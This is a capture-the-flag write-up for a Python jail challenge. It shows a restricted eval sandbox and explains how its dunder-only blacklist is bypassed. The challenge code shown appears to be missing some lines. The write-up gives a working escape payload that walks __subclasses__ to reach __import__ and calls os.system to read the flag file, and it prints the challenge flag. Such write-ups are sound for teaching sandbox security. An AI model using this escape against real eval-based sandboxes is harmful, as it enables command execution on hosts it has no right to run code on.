

Monkey's Paw (384 pts)

Monkey's Paw (384 pts)


I wish these modern pyjails would let me use dunders more..


This challenge is pyjail and the objective is finding the way to do RCE on server through bypassing some blacklist.

#!/usr/local/bin/python3.13 -S

def die():
    print("Don't be greedy")

def check_code(code):
    to_check = ["co_consts", "co_names",
                "co_varnames", "co_freevars", "co_cellvars"]
    for attr in to_check:
        for obj in getattr(code, attr):
            if type(obj) is not str or \
                    len(obj) < 5 or \
                    obj[:2] + obj[-2:] != '____':

code = input("Be careful what you wish for: ")
if "\"'" in code:

code = compile(code, "<string>", "eval")
eval(code, {'__builtins__': {}})

There are total 5 protection implemented in the code, below is the details (simplified explanation)

  • Line 13: The value other then function or attribute can only be string (we can't use integer etc)

  • Line 14: The length of all the values should be greater than 4

  • Line 15: The value must be consist of __ in the start and in the end

  • Line 20: We cannot use the exact "' values

  • Line 25: builtins functions are removed

My teammate (daffainfo) send the payload that would be work without the blacklist (1-4).


My task is converting the payload to make it work with the blacklist. Here is the bypass idea

  • To get the integer value we can use __len__()

  • To use string values that dont have "__" we can use padding and indext subscribe

And below is the converted payload

  • do ls

  • do cat flag_RRkxxMoAAG3mQpoq.txt

__builtins__.__class__.__base__.__subclasses__()["____________________________________________________________________________________________________________________".__len__()].__init__.__builtins__['__import__']('______os_____'["______".__len__():"________".__len__()]).__getattribute__('______system_____'["______".__len__():"____________".__len__()])('______cat flag_RRkxxMoAAG3mQpoq.txt_____'["______".__len__():"___________________________________".__len__()])

Flag: INTIGRITI{y0ur_w15h_w45_6r4n73d_bu7_47_wh47_c057}

Last updated